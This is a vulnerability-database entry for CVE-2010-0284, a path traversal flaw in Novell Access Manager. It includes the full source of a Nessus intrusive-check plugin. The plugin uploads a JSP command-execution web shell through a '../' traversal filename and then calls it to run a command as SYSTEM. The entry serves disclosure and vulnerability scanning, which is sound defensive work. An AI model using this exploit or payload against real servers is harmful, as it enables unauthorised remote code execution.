Vulnerabilities > CVE-2010-0284 - Path Traversal vulnerability in Novell Access Manager 3.1

047910
CVSS 10.0 - CRITICAL
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
COMPLETE
Integrity impact
COMPLETE
Availability impact
COMPLETE
network
low complexity
novell
microsoft
CWE-22
critical
nessus

Summary

Directory traversal vulnerability in the getEntry method in the PortalModuleInstallManager component in a servlet in nps.jar in the Administration Console (aka Access Management Console) in Novell Access Manager 3.1 before 3.1.2-281 on Windows allows remote attackers to create arbitrary files with any contents, and consequently execute arbitrary code, via a .. (dot dot) in a parameter, aka ZDI-CAN-678.

Vulnerable Configurations

Part Description Count
Application
Novell
2
OS
Microsoft
1

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Relative Path Traversal
    An attacker exploits a weakness in input validation on the target by supplying a specially constructed path utilizing dot and slash characters for the purpose of obtaining access to arbitrary files or resources. An attacker modifies a known path on the target in order to reach material that is not available through intended channels. These attacks normally involve adding additional path separators (/ or \) and/or dots (.), or encodings thereof, in various combinations in order to reach parent directories or entirely separate trees of the target's directory structure.
  • Directory Traversal
    An attacker with access to file system resources, either directly or via application logic, will use various file path specification or navigation mechanisms such as ".." in path strings and absolute paths to extend their range of access to inappropriate areas of the file system. The attacker attempts to either explore the file system for recon purposes or access directories and files that are intended to be restricted from their access. Exploring the file system can be achieved through constructing paths presented to directory listing programs, such as "ls" and 'dir', or through specially crafted programs that attempt to explore the file system. The attacker engaging in this type of activity is searching for information that can be used later in a more exploitive attack. Access to restricted directories or files can be achieved through modification of path references utilized by system applications.
  • File System Function Injection, Content Based
    An attack of this type exploits the host's trust in executing remote content including binary files. The files are poisoned with a malicious payload (targeting the file systems accessible by the target software) by the attacker and may be passed through standard channels such as via email, and standard web content like PDF and multimedia files. The attacker exploits known vulnerabilities or handling routines in the target processes. Vulnerabilities of this type have been found in a wide variety of commercial applications from Microsoft Office to Adobe Acrobat and Apple Safari web browser. When the attacker knows the standard handling routines and can identify vulnerabilities and entry points they can be exploited by otherwise seemingly normal content. Once the attack is executed, the attackers' program can access relative directories such as C:\Program Files or other standard system directories to launch further attacks. In a worst case scenario, these programs are combined with other propagation logic and work as a virus.
  • Using Slashes and URL Encoding Combined to Bypass Validation Logic
    This attack targets the encoding of the URL combined with the encoding of the slash characters. An attacker can take advantage of the multiple way of encoding an URL and abuse the interpretation of the URL. An URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE). For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc.
  • Manipulating Input to File System Calls
    An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.

D2sec

nameNovell iManager File Upload
urlhttp://www.d2sec.com/exploits/novell_imanager_file_upload.html

Nessus

  • NASL familyCGI abuses
    NASL idNOVELL_ACCESS_MANAGER_FILE_UPLOAD.NASL
    descriptionThe Administration Console component of Novell Access Manager or Novell iManager hosted on the remote web server has an arbitrary file upload vulnerability. Sending a specially crafted multipart POST request to
    last seen2020-06-01
    modified2020-06-02
    plugin id47581
    published2010-07-01
    reporterThis script is Copyright (C) 2010-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/47581
    titleNovell 'modulemanager' Servlet Arbitrary File Upload (intrusive check)
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    
    include("compat.inc");
    
    
    if (description)
    {
      script_id(47581);
      script_version("1.15");
      script_cvs_date("Date: 2018/11/15 20:50:18");
    
      script_cve_id("CVE-2010-0284");
      script_bugtraq_id(40931, 43635);
      script_xref(name:"Secunia", value:"40198");
      script_xref(name:"Secunia", value:"41687");
    
      script_name(english:"Novell 'modulemanager' Servlet Arbitrary File Upload (intrusive check)");
      script_summary(english:"Tries to upload and access a JSP file");
    
      script_set_attribute(
        attribute:"synopsis",
        value:
    "A web application on the remote Windows host has an arbitrary file
    upload vulnerability."
      );
      script_set_attribute(
        attribute:"description",
        value:
    "The Administration Console component of Novell Access Manager or
    Novell iManager hosted on the remote web server has an arbitrary
    file upload vulnerability.  Sending a specially crafted multipart
    POST request to '/nps/servlet/modulemanager' results in the upload
    of arbitrary data. Specifying a destination filename that contains
    a directory traversal string allows an attacker to write arbitrary
    files as SYSTEM.  Only Windows installs are affected.
    
    A remote attacker could exploit this to upload arbitrary files to the
    system, resulting in remote code execution."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://www.zerodayinitiative.com/advisories/ZDI-10-112/"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"http://www.nessus.org/u?223e218b"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://www.zerodayinitiative.com/advisories/ZDI-10-190/"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://support.microfocus.com/kb/doc.php?id=7006515"
      );
      script_set_attribute(
        attribute:"solution",
        value:"Upgrade to Access Manager 3.1 SP2 / iManager 2.7 ftf3 or later."
      );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"d2_elliot_name", value:"Novell iManager File Upload");
      script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
     script_set_attribute(attribute:"metasploit_name", value:'Novell iManager getMultiPartParameters Arbitrary File Upload');
     script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
      script_set_attribute(attribute:"vuln_publication_date",value:"2010/06/10");
      script_set_attribute(attribute:"patch_publication_date",value:"2010/06/10");
      script_set_attribute(attribute:"plugin_publication_date", value:"2010/07/01");
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"exploited_by_nessus", value:"true");
      script_end_attributes();
    
      script_category(ACT_DESTRUCTIVE_ATTACK);
      script_family(english:"CGI abuses");
    
      script_copyright(english:"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.");
    
      script_dependencies("os_fingerprint.nasl", "http_version.nasl");
      script_exclude_keys("Settings/disable_cgi_scanning");
      script_require_ports("Services/www", 8443);
    
      exit(0);
    }
    
    
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    
    
    # Unless we're paranoid, bail out if OS has been determined and is not Windows
    if (report_paranoia < 2)
    {
      os = get_kb_item('Host/OS');
      if (os && 'Windows' >!< os)
        exit(0, 'Only Windows hosts are affected.');
    }
    
    port = get_http_port(default:8443);
    url = '/nps/servlet/modulemanager';
      
    # The exploit allows us to upload this JSP source which will execute as SYSTEM
    cmd = 'ipconfig';
    jsp_source = '<%@ page import="java.io.*" %>
    <%
    Process p = Runtime.getRuntime().exec("'+cmd+'");
    String output= "";
    String temp = null;
    InputStreamReader reader = new InputStreamReader(p.getInputStream());
    BufferedReader stdin = new BufferedReader(reader);
    
    while ((temp = stdin.readLine()) != null)
    {
      output += temp;
      if (temp.length() > 0) {output += "\\n";}
    }
    %><%= output %>';
    
    boundary = '--nessus';
    filename = SCRIPT_NAME+'-'+rand()+'.jsp';
    postdata =
      boundary+'\r\n'+
      'Content-Disposition: form-data; name="filename"; '+
      'filename="../../../../../../Program Files/Novell/Tomcat/webapps/nps/'+filename+'"\r\n'+
      'Content-Type: application/x-java-archive\r\n\r\n'+
      jsp_source+'\r\n';
    
    req = http_mk_post_req(
      item:url,
      port:port,
      content_type:'multipart/form-data; boundary='+boundary,
      data:postdata
    );
    res = http_send_recv_req(port:port, req:req, exit_on_fail:TRUE);
    
    url = '/nps/'+filename;
    res = http_send_recv3(
      method:"GET",
      item:url,
      port:port,
      exit_on_fail:TRUE
    );
    
    if ('Windows IP Configuration' >< res[2])
    {
      if (report_verbosity > 0)
      {
        report =
          '\n' + "Nessus was able to execute the '" + cmd + "' command by first uploading" +  
          '\na file using the following request :' + 
          '\n' + 
          '\n' + crap(data:"-", length:30) + ' snip ' +  crap(data:"-", length:30) + 
          '\n' + http_mk_buffer_from_req(req:req) + 
          '\n' + crap(data:"-", length:30) + ' snip ' +  crap(data:"-", length:30) + 
          '\n' + 
          '\nand then calling it using the following URL :' + 
          '\n' + 
          '\n  ' + build_url(qs:url, port:port) + '\n';
        if (report_verbosity > 1)
        {
          report +=
            '\nThis produced the following output :\n\n'+
            crap(data:"-", length:30)+' snip '+ crap(data:"-", length:30)+'\n'+
            res[2]+
            crap(data:"-", length:30)+' snip '+ crap(data:"-", length:30)+'\n';
        }
        security_hole(port:port, extra:report);
      }
      else security_hole(port);
    }
    else exit(0, 'The server on port '+port+' is not affected.');
    
  • NASL familyCGI abuses
    NASL idNOVELL_ACCESS_MANAGER_FILE_UPLOAD_SAFE.NASL
    descriptionThe Administration Console component of Novell Access Manager or Novell iManager running on the remote web server has an arbitrary file upload vulnerability. Sending a specially crafted multipart POST request to
    last seen2020-06-01
    modified2020-06-02
    plugin id47582
    published2010-07-01
    reporterThis script is Copyright (C) 2010-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/47582
    titleNovell 'modulemanager' Servlet Arbitrary File Upload (safe check)